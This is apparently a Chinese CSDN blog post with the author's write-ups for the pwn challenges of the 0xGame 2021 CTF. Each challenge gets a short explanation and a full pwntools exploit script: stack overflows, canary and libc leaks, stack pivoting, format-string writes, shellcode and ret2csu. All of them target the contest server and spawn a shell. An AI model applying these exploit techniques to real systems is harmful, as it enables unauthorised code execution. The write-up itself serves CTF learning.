PWN-COMPETITION-0xGame2021

最新推荐文章于 2024-04-24 16:43:17 发布
最新推荐文章于 2024-04-24 16:43:17 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: Pwn-Competition 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/121105787
版权

PWN-COMPETITION-0xGame2021

Pwn?!

直接nc连靶机即可getshell
pwn-flag

ret2text

存在后门,栈溢出覆盖返回地址到后门函数即可getshell

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./pwn01")
io=remote("121.4.15.155",10003)
elf=ELF("./pwn01")

backdoor=0x401157
io.recvuntil("what is ret2text?\n")
payload="a"*(0x50+8)+p64(backdoor)
io.send(payload)
io.interactive()

leak me

第一次puts泄露我们的输入在栈上的地址
第二次puts泄露canary
第三次read构造payload,实现栈迁移,迁移到我们的输入所在地址处,泄露libc,返回到main
第四次read构造payload,栈溢出ret2one-gadget

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10009)
elf=ELF("./pwn01")
libc=ELF("./libc-2.23.so")

puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
pop_rdi=0x401323
ret=0x40101a
main=0x4011D6

leave_ret=0x4012B0

io.recvuntil("Tell me something\n")
payload="a"*(0x30-8)+"b"*8
io.send(payload)
io.recvuntil("b"*8)
stack_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x120
print("stack_addr=="+hex(stack_addr))

io.recvuntil("Tell me something\n")
payload="a"*(0x40-8-8)+"b"*8
io.sendline(payload)
io.recvuntil("b"*8)
canary=u64(io.recv(8))-0x0a
print("canary=="+hex(canary))

io.recvuntil("Tell me something\n")
payload="exit"+"\x00"*4
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
payload=payload.ljust((0x40-8),"a")
payload+=p64(canary)+p64(stack_addr)+p64(leave_ret)
io.send(payload)

puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))

libc_base=puts_addr-0x06f6a0
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[0]

io.recvuntil("Tell me something\n")
payload="exit".ljust((0x40-8),"\x00")
payload+=p64(canary)+"b"*8+p64(ogg)
io.send(payload)

io.interactive()

canary eats pie

格式化字符串漏洞泄露canary和libc基地址,栈溢出ret2one-gadget

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10010)
elf=ELF("./pwn01")
libc=ELF("./libc-2.23.so")

io.recvuntil("isn't it?\n")
payload="%13$p.%15$p."
io.sendline(payload)
io.recvuntil("0x")
canary=int(io.recvuntil(".")[:-1],16)
print("canary=="+hex(canary))
io.recvuntil("0x")
libc_base=int(io.recvuntil(".")[:-1],16)-240-libc.sym["__libc_start_main"]
print("libc_base=="+hex(libc_base))

oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[0]

io.recvuntil("just like before\n")
payload="a"*56+p64(canary)+"b"*8+p64(ogg)
io.send(payload)

io.interactive()

ezpwn?

栈迁移泄露libc基地址,返回到vul函数,再次栈溢出ret2one-gadget

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10008)
elf=ELF("./pwn01")
libc=ELF("./libc-2.23.so")


pop_rdi=0x4012a3
ret=0x40101a
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
vuln=0x401167
leave_ret=0x401192

io.recvuntil("maybe...\n")
payload=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
io.send(payload)

io.recvuntil("Your input has been stored in 0x")
buf_addr=int(io.recvuntil("\n")[:-1],16)

io.recvuntil("Tell me someting more\n")
payload="a"*80+p64(buf_addr-8)+p64(leave_ret)
io.send(payload)

puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-libc.sym["puts"]
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[1]

io.recvuntil("Tell me someting more\n")
payload="a"*(80+8)+p64(ogg)
io.send(payload)


io.interactive()

WTF?Shellcode!

ret2shellcode

# -*- coding:utf-8 -*-
from pwn import *
context.arch="amd64"
#io=process("./pwn01")
io=remote("121.4.15.155",10002)
elf=ELF("./pwn01")

io.recvuntil("What's that?\n")
payload="a"*0x20+asm(shellcraft.sh())
io.send(payload)

io.interactive()

No BackDoor!

system和"/bin/sh"真实地址都已知,根据64位elf参数传递方式构造payload,覆写返回地址,执行system("/bin/sh")

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10001)
elf=ELF("./pwn01")

system=elf.plt["system"]
binsh=0x404040
pop_rdi=0x401223
ret=0x40101a

io.recvuntil("my backdoor?\n")
payload="a"*(0x50+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.send(payload)

io.interactive()

ret2libc pro max

第一次栈溢出泄露libc基地址,第二次栈溢出ret2one-gadget

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10004)
elf=ELF("./pwn01")

puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main=0x401147
pop_rdi=0x401223
ret=0x40101a

io.recvuntil("but more funny\n")
payload="a"*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.send(payload)

puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))

libc_base=puts_addr-0x06f6a0
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[0]

io.recvuntil("but more funny\n")
payload="a"*(0x50+8)+p64(ogg)
io.send(payload)

io.interactive()

Where is my stack?!

两次栈迁移,需要小心指定栈迁移的目标地址

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10005)
elf=ELF("./pwn01")
libc=ELF("./libc-2.23.so")

buf=0x4040A0
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
read_plt=elf.plt["read"]
pop_rdi=0x401293
pop_rsi_r15=0x401291
pop_rsp_r13_r14_r15=0x40128d
ret=0x40101a
main=0x4011AF

#gdb.attach(io,"b * 0x401198")
#pause()

io.recvuntil("then tell me something\n")
#这里调用read只设置了两个参数rdi和rsi,rdx不一定必须设置
#其他需要三个参数的函数同理,可能不需要特殊设置rdx的值
#这里要写到buf+0x500地址处,是因为发现如果写到比如buf+0x100地址处,想要第二次栈迁移getshell的时候,buf地址处的数据在puts后被修改了,而写到buf+0x500地址时则不会被修改
payload="fake_ebp"+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(buf+0x500)+p64(0)+p64(read_plt)+p64(pop_rsp_r13_r14_r15)+p64(buf+0x500)#最后pop rsp是设置了返回地址,由于ret从栈顶弹值,所以去到了read后的栈
io.send(payload)

io.recvuntil("Tell something more\n")
payload="a"*0x50+p64(buf) #这里只能覆盖到rbp,由于本函数正好返回到调用它的函数的结尾leave;ret的位置,所以还是可以构成栈迁移
io.send(payload)

#调用read后,写到buf+0x500地址的数据,上面还有3个pop,所以前面加3个没用的值
payload=p64(0)*3+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.send(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-libc.sym["puts"]
print("libc_base=="+hex(libc_base))
system=libc_base+libc.sym["system"]
binsh=libc_base+libc.search("/bin/sh\x00").next()

#第二次栈迁移,getshell
io.recvuntil("then tell me something\n")
#payload="fake_ebp"+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[1]
payload="fake_ebp"+p64(ogg)
io.send(payload)

io.recvuntil("Tell something more\n")
payload="a"*0x50+p64(buf)
io.send(payload)

#pause()

io.interactive()

N1k0la’s_love

格式化字符串漏洞,覆写data段上变量的值

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10006)
elf=ELF("./pwn01")

love_addr=0x404058
io.recvuntil("love to N1k0la?\n")
payload="%1314c%8$hnaaaaa"+p64(love_addr)
io.send(payload)

io.interactive()

stupid repeater

格式化字符串漏洞,覆写exit的got表内容为后门地址,退出循环,即可getshell

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10007)
elf=ELF("./pwn01")
exit_got=elf.got["exit"]

backdoor=0x4011A7

io.recvuntil("Tell me something:\n")
payload="%"+str(backdoor%0xffff-0x40)+"c%8$hnaaaaa"+p64(exit_got)
io.send(payload)

io.recvuntil("Tell me something:\n")
io.send("exit")

io.interactive()

sign!

ret2syscall+ret2csu,参考:2021-0xGame 第四周 WriteUp

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./pwn01")
io=remote("121.4.15.155",10011)
elf=ELF("./pwn01")

#gdb.attach(io,"b * 0x401121")
#pause()

pop_rdi=0x4011a3
pop_rsi_r15=0x4011a1
syscall=0x40111E
mov_eax_0=0x401135

gadget_1=0x40119A
gadget_2=0x401180

bss=0x404028

def com_gadget(rbx,rbp,r12,r13,r14,r15):
	payload=p64(gadget_1) 
	payload+=p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
	payload+=p64(gadget_2) 
	payload+="a"*56 
	return payload

payload="fake_rbp"+p64(pop_rsi_r15)+p64(bss)+"r15_r15_"+p64(mov_eax_0)+"fake_rbp"+p64(syscall)+"fake_rbp"
#r12,r13,r14为三个参数,r15为想要调用的函数
payload+=com_gadget(0,1,bss,0,0,bss+8)
#bss=="/bin/sh\x00"
#bss+8==p64(syscall)

io.send(payload)

sleep(0.5)

payload="/bin/sh\x00"+p64(syscall)
payload=payload.ljust(59,"a") #read后,rax为59,execve的系统调用号
io.send(payload)

#pause()

io.interactive()

N1k0la’s love 2.0

bss段上的格式化字符串漏洞,覆写data段上变量的值

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn01")
io=remote("121.4.15.155",10012)
elf=ELF("./pwn01")

#offset=0x1249
#io_base = io.libs()[io.cwd + io.argv[0].strip('.')]
#gdb.attach(io,"b * "+str(io_base+offset))
#pause()

io.recvuntil("love to N1k0la?\n")
payload="%11$p.%13$p.".ljust(0x40,"a") #泄漏栈地址和程序基址
io.send(payload)
io.recvuntil("0x")
stack_addr=int(io.recvuntil(".")[:-1],16) #栈地址
print("stack_addr=="+hex(stack_addr))
io.recvuntil("0x")
proc_base=int(io.recvuntil(".")[:-1],16)-0x11C9 #程序基址
print("proc_base=="+hex(proc_base))
love_addr=0x4010+proc_base
print("love_addr=="+hex(love_addr))

#按照bss段上格式化字符串漏洞的思路,分三步写love值为1314
# 1.找到一条合适的链,覆写链上的值为一个栈地址,这个栈地址保存了一个与目标地址相近的地址
# 2.还是同一条链,覆写那个与目标地址相近的地址为目标地址
# 3.还是同一条链,覆写目标地址的值为1314

io.recvuntil("love to N1k0la?\n")
addr1=stack_addr-0xC0
addr1=addr1&0xffff
print("addr1=="+hex(addr1))
payload="%"+str(addr1)+"c%11$hn" 
payload=payload.ljust(0x40,"a")
io.send(payload) #此时的链应为11->37->13

io.recvuntil("love to N1k0la?\n")
addr2=love_addr&0xffff
print("addr2=="+hex(addr2))
payload="%"+str(addr2)+"c%37$hn"
payload=payload.ljust(0x40,"a")
io.send(payload)

io.recvuntil("love to N1k0la?\n")
payload="%"+str(1314)+"c%13$hn"
payload=payload.ljust(0x40,"a")
io.send(payload)

#最后两个随意输入即可
io.recvuntil("love to N1k0la?\n")
io.send("a"*0x40)

io.recvuntil("love to N1k0la?\n")
io.send("a"*0x40)

#pause()

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
gris-treinamentos-pwn-2021
03-31
gris-treinamentos-pwn-2021 幻灯片浏览器
Pwn_0xGame_01
Trick的博客
11-08 524
Pwn_0xGame1.欢迎来到0xGame平台2.帮我取一个题目名称ret2text3.easy_stack4.该怎么起名呢shellcode5.variable_coverage变量覆盖 1.欢迎来到0xGame平台 nc出flag 2.帮我取一个题目名称 ret2text 打开IDA分析 main函数 跟进 第二个函数 s栈大小为20h=32 函数最后return read了s 所以很好写了 因为是64位程序,后面再加上8个字符 payload = 'a' * (0x20+8) Shift+F1
南邮0xGame 2021 Crypto WriteUps
weixin_56678592的博客
11-05 1170
南邮0xGame Crypto WriteUps 记录几道南邮新生赛的题目学习学习。 #1 Wilson 题目: from Crypto.Util.number import getPrime, bytes_to_long from gmpy2 import next_prime # length of flag is 37 p = getPrime(512) q = next_prime(p) f = open('flag.txt', 'rb') flag = bytes_to_long(f.read(
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1222
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
Pwn_0xGame_02
Trick的博客
11-08 429
Pwn_0xGame_021.Pwn题滞销,帮帮我好吗?syscall 1.Pwn题滞销,帮帮我好吗? syscall IDA打开 发现是个syscall的题目 直接去看这个函数的汇编 根据师傅们所说,我们需要让rax存入59,让syscall去调用execve函数 (ret2syscall?) syscall_64 GitHub查询 之后要构造出来 execve("/bin/sh",0,0) 拿取权限 找"/bin/sh"字符串 方法一: 在程序中有,找到它 从’[‘数起到斜杠前面的空格’ ',再
2021 天翼杯 pwn ezshell
yongbaoii的博客
09-24 957
逻辑简单,开了一个可以rwx的页,我们输入一段shellcode,绕过一些检查,开了沙箱,最后执行它。 一点一点来,首先我们输入shellcode之后函数__ctype_b_loc函数是干嘛的? 我们去读源码,在ctype/ctype.h #ifndef _ISbit /* These are all the characteristics of characters. If there get to be more than 16 distinct characteristics, many.
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2021-鹏城实验室-pwn-babyheap.zip
09-28
2021年鹏城实验室的pwn题,考查了libc-2.31.so下off-by-null的漏洞利用,值得学习一波。
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
[XCTF-pwn] 23_4-ReeHY-main-100
weixin_52640415的博客
03-08 179
堆,索引上边界溢出。 一个堆题,没开pie的情况下,指针区是完全暴露的。同时对上边界没有检查。利用上边界溢出将数据覆盖块size区将size改大,再利用块的写溢出啥都搞。 int __fastcall m1add(__int64 a1, __int64 a2) { int result; // eax char buf[128]; // [rsp+0h] [rbp-90h] BYREF void *dest; // [rsp+80h] [rbp-10h] int v5; // [rsp
ciscn_2019_es_7 6/100
m0_57754423的博客
03-02 268
漏洞点: 经典SROP write函数泄露栈的地址 栈上写入'/bin/sh'字符串,控制rdi为 sh 字符串地址,rax为sigreturn系统调用号 exp: from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './es_7' debug = 1 if debug: r = remote('node4.buuoj.cn', 28915) else: r
NX,Canary,RELRO,PIE,Linux的4种保护机制讲解
半岛铁盒的博客
12-18 4965
 NX(DEP):数据执行防护  Canary(FS):栈溢出保护  RELRO(ASLR):(地址随机化)  PIE(代码地址随机化) NX: 栈上的数据没有执行权限 防止攻击手段:栈溢出 + 跳到栈上执行shellcode CANARY: 在函数开始时就随机产生一个值,将这个值CANARY 放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲 区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆 盖掉CANARY的值;当程序结束时,程序会检查 CANARY这个值和之前的是否一致,如果不一致,则
2019.7.22 babypie(canary绕过)和一些调试技巧
DSR446的博客
08-12 851
1. 以上是程序的反编译代码和保护机制。我们可以看出他开了canary保护。我们运行一下程序,发现只要输入一定数额的字符,其可以保持正常功能。 2.canary总是保存在bp的上面,意是我们虽然开辟了48字节的空间,但真正能写的只有40字节。最近遇到一个pwn大佬,跟着他学到了很多gdb调试的技巧,我想把它结合这个题目记录下来。 3. 我们可以在代码中加入gdb.attach(io,’’),让程...
buu reverse 5题 pwn简单nc 1题
空舟的博客
07-19 1311
1.新年快乐 查看有upx壳,脱壳 拉入32位ida if ( !strncmp((const char *)&v5, &v4, strlen(&v4)) ) result = puts("this is true flag!"); v5与v4比较,v4=HappyNewYear! flag{HappyNewYear!} 2.[BJDCTF 2nd]guessgame1 无壳,拉入64位ida F5伪代码,shilf+F12查看字符串,直接出来 BJD{S1mpl
全视通智慧手术室对讲方案,让手术更安全更高效
最新发布
2301_78035670的博客
04-24 301
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
黑龙江—等保测评三级安全设计思路
2403_84237550的博客
04-19 846
本方案在对信息系统可能面临的安全威胁进行分析的基础上,结合安全域的划分,从物理层、网络层、系统层、应用层、数据层和管理层几个安全层面进行了整体的安全设计,在整体保障框架的指导下,综合多种有效的安全防护措施,进行多层和多重防御,实现纵深防御。3、体现了分域防护的思想。不同的安全等级要求具有不同的基本安全保护能力,实现基本安全保护能力将通过选用合适的安全措施或安全控制来保证,可以使用的安全措施或安全控制表现为安全基本要求,依据实现方式的不同,信息系统等级保护的安全基本要求分为技术要求和管理要求两大类。
安全开发实战(4)--whois与子域名爆破
weixin_72543266的博客
04-18 801
安全开发实战(4)--whois与子域名爆破 Whois 查询是一种用于获取有关互联网域名注册信息的公共查询服务。当注册一个域名时,必须提供一些个人或组织信息,例如姓名、电子邮件地址、联系电话等。这些信息通常是公开的,可以通过 Whois 查询来获取。在渗透测试中,Whois 查询可以我们收集目标组织的关键信息。组织联系信息:包括名称、地址、电话号码和电子邮件地址。这些信息可以用于建立联系、进行社会工程攻击或者其他类型的攻击。域名到期日期:了解域名何时到期可以帮助我们预测目标可能面临的安全风险。
CISAW应急服务:网络安全应急响应之路——从经验到认证的体会
2402_84109700的博客
04-24 491
近年,我曾指导客户处理过DDOS攻击事件,当时客户网络遭受DDoS攻击,流量峰值特别大,明确客户的求援需求后,我带领团队人员立即展开应急响应:首先,我们通过流量清洗对异常流量进行了识别和过滤,与此同时开展对防火墙策略进行加固、对重要应用限流、对网络结构优化等工作,最大程度提升其抗DDoS的能力。应急响应是网络安全至关重要的环节。通过这次应急响应,使我意识到做好充分的应急准备阶段工作是帮助客户成功应对网络安全事件非常重要的一环,比如局域网要定期进行漏扫和安全审计,并有针对性采取相应的应急服务响应机制。
docker pwn
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行设置: 1. 克隆pwndocker仓库: ```shell git clone https://github.com/Green-Avocado/pwndocker.git ``` 2. 进入pwndocker目录: ```shell cd pwndocker ``` 3. 运行setup.sh脚本(请勿使用超级用户身份运行): ```shell sudo ./setup.sh ``` 完成上述步骤后,您将获得一个已配置好的Docker容器,其中包含了一些常用的CTF工具和调试器,例如pwndbg。 如果您想要在Docker容器中实现命令和输出分别在两个终端窗口的效果,可以按照以下步骤进行设置: 1. 将您的终端分成两块(例如,在Mac上使用⌘ + d进行垂直分屏)。 2. 在第一个终端中,使用tty命令查看当前终端用于显示连接到当前标准输入的终端设备文件名。通常情况下,第一个终端的设备文件名为/dev/pts/0。 3. 在第一个终端中,编辑pwndbg的配置文件(通常位于~/.gdbinit)。 4. 在配置文件中添加以下内容,并将/dev/pts/1替换为第二个终端的设备文件名: ```shell set context-output /dev/pts/1 ``` 5. 保存并退出配置文件。 完成上述步骤后,您将能够在第一个终端中输入命令,并在第二个终端中查看输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值